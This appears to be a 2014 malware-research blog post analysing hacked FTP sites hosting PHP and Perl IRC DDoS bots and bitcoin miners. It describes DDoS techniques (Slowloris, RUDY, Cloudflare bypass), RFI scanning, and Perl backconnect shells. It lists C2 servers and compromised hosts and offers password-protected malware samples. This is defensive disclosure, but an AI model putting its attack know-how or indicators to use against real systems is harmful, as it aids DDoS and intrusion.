During investigation on these attacker services, finally I also learned a "trend" of recent terms used by these DDoS'er with the correct explanation collected below which can be used as quick reference for the attack method or in the scripts that they are using during checking infected sites by these attacker's front end tools. We mentioned the same explanation in previous post in investigating their attacker scripts, but this explanation is more accurate, is a very good know how to know :

1. UDP Flood

Is a DoS to flood the target with the varius combination of UDP packet, a sessionless/connectionless computer networking protocol. Thi sattack is effectively working for the home connections. UDP flood are applified by script (program) and that can be amplified to over 20Gbps, practically to make the target is as good as offline.

2. Chargen

Chargen is another UDP type flood attack, working effectively on using port 8080 for optimal results. This atack is generated by Chargen script logic (PHP/Perl/C) that can be amplified over 20Gbps. The target is the Chargen (port 19) service which derrives the name, can be spoofed into sending data from one service in a computer to another service on another computer. This attack can consume incleasing amount of network bandwith causing loss of performance or a total shutdown of the affected network segments. This attack can disable a unix server by causing it to spend all of its time processing UDP packets that it has echoed back to itself.

3. UDPLag:

Just like UDP flood but this attack will not hit the target offline, instead it will make them lag.

4. ESSYN Flood

Applified spoofed SYN attack that abuses the TCP 3-way handshake by never responding to the target's TCP confirmation response, made it wait for the handshake done indefinitely.

5. Slowloris

An extremely useful method of attack to webservers running Apache, Tomdat and GoAhead. By keeping as many as possible connections open for as long as possible by only sending partial requests and thus blocks access to the server for other clients.

6. Rudy (R U Dead Yet)

By sending small packets of 1 byte through a HTTP POST request it will force the connection with the server to stay open. RUDY is harder to detect and prevent.

7. ARME

ARME is considered a layer 4 attack method. It is pretty strong due to it eats up all of the SWAP memory of a servers runs Apache, eventually letting it flood the HDD resulting into out of operation and the server services will be shutdown.

8. Resolver

This is not the attacker techniques but the common function of the DDoS'er tool that exists in the market nowaways to resolve (8.1.) Real IP address of the Host protected behind the Cloudflare service, (8.2.) Real IP address of the Skype users, to perform the above attacks.

DDoS Source Code (L7+L4) & Amplification IP list

Along with the investigation we collected and secured the recent source codes that has been used for DDoS activities, together with its companion the amplification IP address list, and also grabbed some know how that's been shared in the xxx lair by the skids and hackers. Below is the video of what is shared, check it first to make sure that you need it or not:

The download for the package (5.32 MB) is here-->>[Secure Code: 777022].
You will need the password for the archive, so please put comment in the bottom of this post for the request & explaining a bit about who you are, why you need the source code, and where we can contact you (no comment will be published).
The purpose of the sharing is to raise scan detection ratio for those codes/scrips/binaries, forwarding the knowledge used by attacker to the DDoS prevention entities, a share to the security community who's fighting this threat. We don't take any responsibility of the mis-used of the shared material passed to the unknown third parties.

Epilogue

In the end, this information hopefully to explain how DDoS is served and how DDoS is always on operation. Also how some of these services are wrapped with a simple GUI to be used for the attack. Suspending domain or mitigating DDoS services like these is not making much effect, and we need more firm act to stop individuals and infrastructure used to perform it. They are using common domains, web sites, even YouTube for promotion, moreover some of them are using known DDoS protection service to guard their DDoS'er sites (see below picture), it's just went too far, and maybe now is a right time to say "STOP".

But stopping these are easy to be said than done. I was thinking that maybe we need to push this awareness more to raise the importance in making a smoother scheme to fight this threat, hoping this post and other similar previous posts by others of this issue can escalate the process.

Kudos twitter friends with great comments!

Thank's to DOMAIN.ME & PW Registry for the instant suspensions. Thank you so much to these cool IT guys: @cesi0_ @DarkSunsetSX @NotBluntMan @BugTracK @LibidinousPrick @jedisct1 @VriesHD @whalezeye and all friends that favorites and RT, for the great support & comments during the trip (see below). And to MMD team: @essachin @malm0u53 @wirehack7 @MichalKoczwara for the support & for tango help!

Stay safe folks! #MalwareMustDie!

Monday, June 2, 2014

A journey to abused FTP sites (story of: Shells, Malware, Bots, DDoS & Spam) - Part 2

This writing is dedicated to fellow sysadmins all over the networks in this globe, who work hard keeping internet services running smoothly and help to clean the bad stuff, you rocks! Respect! This is the second part of the previously posted analysis here-->>[Part 1]

Observation

In this part I will discuss the FTP hacked sites reported as per below snapshots, I will call them as Case 4, 5, 6, and 7 (bonus case), and NEW! Case 8 (additional)


Case #4: IRC Bot PHP Pbot(s) - The evolution begins..

As per explained in the first part, there were some IRC bots detected in the abused FTP sites reported, one of the bots called pbot(s), and in this part we will explain how the IRC Bot PHP Pbot evolved. In all of the cases 4, 5, 6 and 7 there are pbots found. I guess the IDS scanner can detect some significant strings to filter this contents of these bot's codes, good job!

I made some writings of pbot we cracked in there links: [1] and [2], with or without encoding or obfuscation in its codes. I think those cases was spotted around 2012 and January 2013. Back then the pbot was having so limited "weapon" functions in attacking, which were:

- TCP Flood
- UDP Flood
- Port Scanning
Yes, that's it for the aggressive attack they had, TCP Flood & UDP Flood is the only DoS scheme they had back then. There are some IRC & networking related functions like "backconnect" to poke the master in some #hacker-paradise ircd waiting for the compromised sites popping up in their channels & etc IRC communication commands for the operational purpose of the bot.

Now let's we take a peek to the Case #4, in each directory "a/" or "b/" injected in the root directory of this FTP service you can find the script called li.php, and this files looks was last updated in June 1 & May 31, 2014.

This"version" of pbot is having improvement in UDP Flood attack function, as per below codes, which is supporting to the multiple scanning:

..and also the downgrade of the TCP Flood function into a TCP Connecting function:

The operation method used as a "bot" is focusing in utilizing Windows shell command execution by multiple methods in executing it, with additional a option for execution via the Perl method. Below are the snippet methods used to execute Windows shell:

..and this is how the Perl is used to perform shell execution:

The shell execution methods above are then linked to the PHP "evil" functions to be used for the further operations by this pbot:

The IRC connection method used is similar as previous version, a classic method used some other bots too, with the an array as per below, containing the IRC server IP, port number, password, channel, and host's auth, with additional components to be used for forming a specific format of NICK, and USER (with using the $ident):

By simulating the above information, forming a fake NICK using the stated logic, following the forming of USER name below, we can start to pretend as a bot to connect their IRC server:

A simple test like below will confirm the actor's server status:

It seems like China network is under abused to be utilized as IRC's CNC for this case's attacker:

Check Date: Tue Jun  3 01:21:20 JST 2014
IP: 222.216.30.28
ASN: 4134
Network Prefix: 222.216.0.0/15
AS Name: CHINANET
Country: CN
ISP: CHINATELECOM.COM.CN
Company: CHINANET GUANGXI PROVINCE NETWORK

There are other very generic functions commonly used in IRC bots like: making PING PONG pokes, sending email using the PHP mail function, get the system environment via PHP uname, downloading stuffs to the compromised server by utilizing safe area in /tmp, etc.. which I don't explain in here since you'll see it in the samples shared too, as a very self explanatory codes.

The sample in VT is here-->>[VT]
Let's move on to the next cases...

Case #5: A bummer pbot (no comment)

In this case we are dealing with the file named as bot.php . Well.. wow.. it must be a crook with a very high self-confidence or very stupid or a greenhorn skids to hack an FTP with uploading such straight forward file name. Protip: If you find this kind of file in your watched servers just please delete it without asking, or send it to Virus Total first and delete it, OK? :-) Don't worry, it must be bad, either the file or the person who named it that way.

OK, the bot.php is also a pbot with the same version as we discussed in Case #4. The difference with the previous case is the IRC connection (below pic) and the way it slices packet size for UDP Flood:

A test drive...

13:12 -!- Irssi: Looking up 120.43.64.62
13:12 -!- Irssi: Connecting to 120.43.64.62 [120.43.64.62] port 10000
13:12 -!- Irssi: Unable to connect server 120.43.64.62 port 10000 [Connection refused]
oh mai...what a bummer..

The sample in VT is here-->>[VT]
OK, let's move on!

Case #6 & # 7: BTC miners & PWS PE payloads + Behold.. New fully weaponized Pbots..

This is the case where I found the Cloudflare DDoS mitigation code, as I tweeted below:

Yes, I found the function in Pbot codes, was dated, in the earliest as from March 28th and 30th, 2014.

These two FTP cases are so identical in its injected payloads, gesturing the same actors are behind these two compromised FTP incident, we'll see it later..
While both site's root directories are filled by the WinPE binaries that was shown in above screenshots in Observation part. Later on we know those as Bitcoin Miners & PWS, old stuff mostly made by VB or .NET, known malware with good detection rates, you can get the samples and feel free to analyze yourself but I must skip these analysis for having not much time to write.

And the "pub/" directories of both sites are filled with bots, just like the WinPE in the root directories, the pattern of both sites are the same, as per shown below:

What I marked with the yellow color are the pbot(s) with the version that has been discussed in the Case #4, and looks like we have the evolution in version which was marked in the red color. The rest of the files will be explained separately.

Since we know the characteristic of pbot by peeking closely to their code, we can quick analyze the source of attacker in mass injection files like this with a simple grep command, to see straight to the source, in my case I grep the bellow strings:

array("server"=>"
And getting these answers for the "not so new" pbots:

With extracting these IRC channel used as CNC and their channels:
89.248.171.42 "chan"=>"#rhd" 
89.248.171.43 "chan"=>"#rhd" 
89.248.171.44 "chan"=>"#rhd" 
89.248.171.45 "chan"=>"#rhd" 
93.174.88.124 "chan"=>"#Xtreme"
94.102.63.134 "chan"=>"#Xtreme"
94.102.63.135 "chan"=>"#Xtreme"
94.102.63.136 "chan"=>"#Xtreme"
94.102.63.137 "chan"=>"#Xtreme"
And for the new/latest pbot I extarcted the below data:
124.php(3):    "server" => "93.174.88.124", "chan"=>"#lsass"
newbot.php(3): "server" => "89.248.171.54", "chan"=>"#lsass"
15.php(11):    "server" => "89.248.171.54", "chan"=>"#news"
bot15.php(11): "server" => "89.248.171.54", "chan"=>"#news"
So we have 4 channels in 10 IRC servers are herdering these pbots in two FTP cases, and shortly speaking, most of the IRC servers and channels are up and alive (checked & doing some investigation now..)

The ECATEL, Netherlands network in ASN: 29073 and network of 89.248.170.0/23 and 94.102.48.0/20 are completely being abused by these attacker for the IRC network CNC on these bots:

89.248.171.42|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
89.248.171.43|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
89.248.171.44|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
89.248.171.45|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
89.248.171.54|hosted-by.ecatel.net.|29073 | 89.248.170.0/23 | ECATEL | NL | ECATEL.NET | ECATEL LTD
93.174.88.124|hosted-by.ecatel.net.|29073 | 93.174.88.0/21 | ECATEL | NL | WEBHOST.COM.AU | DEDICATED SERVERS
94.102.63.134||29073 | 94.102.48.0/20 | ECATEL | NL | ECATEL.NET | ECATEL LTD
94.102.63.135||29073 | 94.102.48.0/20 | ECATEL | NL | ECATEL.NET | ECATEL LTD
94.102.63.136||29073 | 94.102.48.0/20 | ECATEL | NL | ECATEL.NET | ECATEL LTD
94.102.63.137||29073 | 94.102.48.0/20 | ECATEL | NL | ECATEL.NET | ECATEL LTD

On June 3rd, 2014. Some of previous version of pbot (with only had udp/tcp attack) was upgraded into the fully weaponized (with multiple L7 DDoS attack functionalities). There is no new IP for IRCd (CNC) used, but now we know precisely the meaning of the fikename is the last block of the IP address that is being used as CNC < this is a PoC that these crook is really using the segment of network described in the above list and utilizing it for the attack, No one will name an attack bot as IP address 42,43,44,45 which matched to the IP addresses used unless owning that network. Owning by the meaning maybe by hack, or.. more like by rent. Below is my tweet answering MR. Rik van Duijn's question about this matter, with the sample share:


Samples is in Virus Total ;-)) here --> [-1-] [-2-] [-3-] [-4-] [-5-] [-6-]

Well, we know the source of attacker. Now what is inside of the recent version of pbot and what is its difference with the previous version? Below are the explanation with the screenshots:

Basic function improved

The way they use the channel and connection are very specific:

This pbot version is having a set of User Agent for HTTP purpose (DDoS), as per listed below:

In this version, in forming the NICK the GeoIP codes is implemented:

There are some messages in Portuguese language, advising the coder's is from country that is speaking that language.

..and a lot of etc new bot functions which is improving the quality of the previous version pretty much, you can see it in the source code that will be shared later on.

Heavily armed and dangerous..

For the attack functionality this recent new pbot version has:

- udpflood
- httpflood (NEW!)
- synflood (IMPRPOVED!)
- slowlorrisflood (NEW!)
- rudyflood (NEW!)
- armeflood (NEW!)
- cloudflareflood (NEW!)
- tcpflood (IMPROVED)
- Data Cha0s Connect Back Backdoor (NEW)
I will snippet the NEW! attack function source code for the mitigation purpose with the quick explanation.

httpflood ; OK, at least now we know how user-agent is used :-)

synflood ; I personally not thinking SYN attack is new, but it is in a pbot..(at least for me) so here's the snips:

tcpflood ; Well.. this attack is not a dummy attack anymore.. Finally they figured a way to code this section :)

slowlorrisflood ; This is a DDoS method in sending packet without a haste to flood by using GET or POST, the logic is very interesting as per detailed below, the DDoS guard industries must review this code and start to make mitigation of this logic. Ref-->[link]

armeflood ; It's an attack focusing the HEAD flood request to the victims :

rudyflood ; I have no idea why this were named as "rudy" :-) But it is flooding victims with randomizing packet size and toying with the combination request Content-Length looks like the main purpose to DoS the victim's server:

cloudflareflood ; This is as per it sounds, a nasty code meant to evade Cloudflare. I tweeted this mentioning to Cloudflare to mitigate this code as soon as possible. Below is the attack logic:

If you see the CURL command used in above functions, is the homemade function actually:

"Data Cha0s Connect Back Backdoor" ; Wow..what a name! :D This evil code is actually hidden in conback($ip, $port) function here:

The logic is simply decoding & save the base64 blob into a .pl file, and executing it by perl. What was decoded is actually a SHELL in Perl:

I think that's it for the recent Pbot. For mitigation purpose, please learn the full code that can be seen in the samples (shared to the security community only).
The virus Total detection is as following result in each samples spotted: [-1-] [-2-] [-3-] [-4-]

The last mistery to solve is HOW the WinPE binary got into the root of this FTP server. It is answered by the rest of scripts located in "/pub", which are win.php. test.php and wink.php. These scripts looks like a helper of the pbot, to be executed for downloading the other files as per commanded by the bot herder. Well, the codes says thousand words, please see below snippets:

You can see the multiple method used to download those binaries. Mistery is solved :-)

Conclusion, infected IP, VT and samples

So now we see how much we can get by investigating only several URLs. Every alert is worth to investigate as deep as this (or I may say I expect deeper since I do this after day work only). You will never know what you will find unless you dive-in to it. Thank's again to "Yin" for allowing me to write this to raise awareness.

The PHP IRC pbot itself evolved from the to be a dangerous threat since the first time we covered 2 years ago. However the nature of itself is the same, like using PHP ..yet using Perl also, the way it connects the channel, and so on.. So it is very good to know each bots characteristic.
Pbot is now weaponized with many L7 DDoS attack pattern.

If you take a look into the www.digitalattackmap.com link-->(here) to view the current on going DDoS attack traffic to USA and it sources. I snapshot the map as per shown below, you will see that the countries related to the source of attackers disclosed in this series of posts is matched and I marked them in red circles in the map below:
I have no doubt that this findings is actually disclosing groups of DDoS attacker "skids".

I must urge to investigate deeper the IRC channels and the individuals who are running this L7 DDoS show, the ID is all there and is not a hard thing to infiltrate, so if you are familiar enough with IRC you can join our mission in visiting these servers to gain more intel that can get into a cyber crime cases to teach these skids a lesson.

Samples are shared in this URL with the secure code-->>[Secure Code: 110369]

The overall Part 1 and 2 mentioned compromised FTP information we announced as per below FTP url, IP addresses, Network Information and GeoIP. For the purpose to ask your help to clean up these infection;

ftp:// agunsa .cl/
ftp:// 192.210.235 .101/
ftp:// 37.187.99 .73/
ftp:// 188.165.74 .149/pub/
ftp:// 37.59.68 .30/pub/
ftp:// 204.44.81 .9/
ftp:// edge.leet .la/

200.72.244.167 
200.27.146.162
192.210.235.101
37.187.99.73
188.165.74.149
37.59.68.30
204.44.81.9
79.114.113.196

200.72.244.167||6471 | 200.72.224.0/19 | ENTEL | CL | ENTEL.CL | ENTEL CHILE S.A.
200.27.146.162||6429 | 200.27.128.0/19 | Telmex | CL | AGUNSA.CL | TELMEX CHILE INTERNETS.A.
192.210.235.101||36352 | 192.210.232.0/22 | AS-COLOCROSSING | US | COLOCROSSING.COM | VPS6.NET LP
37.187.99.73|cpe-92-37-48-248.dynamic.bluedesign.si.|16276 | 37.187.0.0/16 | OVH | FR | OVH.COM | OVH SAS
188.165.74.149||16276 | 188.165.0.0/16 | OVH | NL | OVH.COM | OVH SAS
37.59.68.30||16276 | 37.59.0.0/16 | OVH | FR | OVH.COM | OVH SAS
204.44.81.9|204.44.81.9.static.virtuaclub.com.|29761 | 204.44.64.0/18 | AS-QUADRANET | US | QUADRANET.COM | QUADRANET INC
79.114.113.196|79-114-113-196.rdsnet.ro.|8708 | 79.112.0.0/13 | RCS | RO | RDSNET.RO | RCS & RDS RESIDENTIALI

200.72.244.167, Santiago, Chile, SA
200.27.146.162, Santiago, Chile, SA
192.210.235.101, New York, United States, NA
37.187.99.73, , France, EU
188.165.74.149, , France, EU
37.59.68.30, , France, EU
204.44.81.9, , United States, NA
79.114.113.196, Timisoara, Romania, EU

Case 8: The hack scheme for BitCoin Mining using Perl Bot RFI scanner

This case is an additional, the last one, I received the report afterwards. The case is interesting so I decided to add this post's contents. It is about the hack attempt using many bots for spreading BitCoin Miners. The actor is hacking webapp RFI vulnerable services, injecting the bots and installing the bitcoin mining servers and applications in the compromised system, and then using the exploited system as a base to infect other services too.

The overall file list can be viewed in the snapshot above (the last one)-->>here. and the diagram below is the summary that I made to explain the legend of components that had been spotted in this act:

The classification of the files above "if" we want to see it by firing "file" is as per below:

But there are some mis detect also, for those let's do the manual check.

How the hack scheme is working

Before jump into details I will explain how the hack was done by the components above. The circle of this hack attempt was started by scanning using the Perl Bot/IRC called "perlb0t" (too obvious name..), and scanning for the RFI vulnerable sites and attack them to gain exploit. When shell was gained, what they do is injecting the site with file of "update" (or "c) which contains the code below to download the installer "a", and executed it:

The installer will run the below codes to preparing evil, installation to download miners and bots, and then running them without leaving any trace:

This is the initiation setup that was made by hacker after gaining this site, and preparing some remote executable scripts to download from this site and install to another machine like the "bot" script in PHP below:

The ELF files are UPX packer software, but "clamav" and "sh" are minerd, a known bitcoin miner daemon:

.rodata:0x06C318  Usage: minerd [OPTIONS]
.rodata:0x06C330  Options:
.rodata:0x06C339    -a, --algo=ALGO       specify the algorithm to use
.rodata:0x06C36E                            scrypt    scrypt(1024, 1, 1) (default)
.rodata:0x06C3AF                            sha256d   SHA-256d
.rodata:0x06C3DC    -o, --url=URL         URL of mining server (default: http://127.0.0.1:9332/)
.rodata:0x06C42B    -O, --userpass=U:P    username:password pair for mining server
.rodata:0x06C46C    -u, --user=USERNAME   username for mining server
.rodata:0x06C49F    -p, --pass=PASSWORD   password for mining server
.rodata:0x06C4D2        --cert=FILE       certificate for mining server using SSL
.rodata:0x06C512    -x, --proxy=[PROTOCOL://]HOST[:PORT]  connect through a proxy
.rodata:0x06C552    -t, --threads=N       number of miner threads (default: number of processors)
.rodata:0x06C5A2    -r, --retries=N       number of times to retry if a network call fails
.rodata:0x06C5EB                            (default: retry indefinitely)
.rodata:0x06C623    -R, --retry-pause=N   time to pause between retries, in seconds (default: 30)
.rodata:0x06C673    -T, --timeout=N       network timeout, in seconds (default: 270)
.rodata:0x06C6B6    -s, --scantime=N      upper bound on time spent scanning current work when
.rodata:0x06C703                            long polling is unavailable, in seconds (default: 5)
.rodata:0x06C752        --no-longpoll     disable X-Long-Polling support
.rodata:0x06C789        --no-stratum      disable X-Stratum support
.rodata:0x06C7BB    -q, --quiet           disable per-thread hashmeter output
.rodata:0x06C7F7    -D, --debug           enable debug output
.rodata:0x06C823    -P, --protocol-dump   verbose dump of protocol-level activities
.rodata:0x06C865    -S, --syslog          use system log for output messages
.rodata:0x06C8A0    -B, --background      run the miner in the background
.rodata:0x06C8D8        --benchmark       run in offline benchmark mode
.rodata:0x06C90E    -c, --config=FILE     load a JSON-format configuration file
.rodata:0x06C94C    -V, --version         display version information and exit
.rodata:0x06C989    -h, --help            display this help text and exit
.rodata:0x06C9C8  accepted: %lu/%lu (%.2f%%), %s khash/s %s
.rodata:0x06C9F8  DEBUG: job_id=^%s^ extranonce2=%s ntime=%08x
.rodata:0x06CA28  Stratum connection interrupted
.rodata:0x06CA48  {^method^: ^getwork^, ^params^: [], ^id^:0}
.rodata:0x06CA78  DEBUG: stale work detected, discarding
.rodata:0x06CAA0  {^method^: ^mining.submit^, ^params^: [^%s^, ^%s^, ^%s^, ^%s^, ^%s^], ^id^:4}
.rodata:0x06CAF0  submit_upstream_work stratum_send_line failed
.rodata:0x06CB20  {^method^: ^getwork^, ^params^: [ ^%s^ ], ^id^:1}
And the WinPE are all bitcoin mining application, although some AV stated these as "Not A Virus" I assure you that you never want these files to get into your system. VT report: [-1-] [-2-] [-3-]

Perl IRC/Bot "perlb0t"

This bot is nasty, and responsible for the RFI scanning and exploiting vulnerable hosts for being used to install bitcoin mining. "lol" and "plm" are these bot files. The highlights of this bot I'll paste it in images snipped below.

The IRC connection (CNC):

The host's port scanner
And this is how it scans the RFI vulnerability:
As you can see the path of "/SQuery/lib/gore.php?libpath=" is aiming the exploit shown in-->>here with more reference in-->>here
There is an interesting function called "Spreader" which actually searching for specific query of site via Google search engine, first they are preparing domains in an array:

And excute the search by Google API as per below:

And the HTTP query is formed here:

The other Perl bot (file: s0nia, php) called "Power Bot" is not that interesting at all and contains the basic bots as usual portscanner & basic HTTP flood attacks, with remote IRC connect, backconnect, and so on.., and the pbot (botphp file) found is the older version. So it is faster if you see the shared sample directly.

The CNC of this case are:
All of downloads are linked to OVH IP addess:

Req time: Wed Jun  4 22:50:59 JST 2014
UP: 176.31.255.138
Result: ns388807.ovh.net.|16276 | 176.31.0.0/16 | OVH | FR | OVH.COM | OVH SAS
And the IRCd used are listed below:
myircd.wha.la port: 3303 Nick: LINUX
oakleyharrod.mooo.com port: 3303 Nick: Bot
topsrv.us.to port: 3303 Nick Pma
topsrv.us.to port: 3303 Nick JSP
located in Turkey, Germany and France:
77.92.147.142|static-142-147-92-77.sadecehosting.net.|42910 | 77.92.147.0/24 | SADECEHOSTING | TR | SADECEHOSTING.COM | HOSTING INTERNET HIZMETLERI SANAYI VE TICARET ANONIM SIRKETI
85.214.70.175||6724 | 85.214.0.0/15 | STRATO | DE | STRATO.DE | STRATO AG
213.152.3.19|eleves.dev.advoo.fr.|8218 | 213.152.0.0/19 | NEO | FR | NEOTELECOMS.COM | NEO TELECOMS S.A.S.

The Case #8 samples can be download here after you fill the secure code-->>[Secure Code: 54349398].

And the VT links for these bot files are: [-1-] [-2-] [-3-] [-4-] [-5-]

Following the CNC network information gathered from this post's investigation, leading us to the DDoS're or Booter (or Stresser) services that are involved in using hacked FTP sites/accounts and utilizing the hacked server for performing DDoS activity. The DDoS'er services that is proven connected to this hack attack is posted in the next report, together with some popular DDoS'er tools covered, in here -->>[MMD Next Blog]

It's been a long writing, if you think it is useful and can help others, do not keep this information to your self but spread it out, it is good to make more sysadmins aware of these details. Stay safe, folks!

#MalwareMustDie!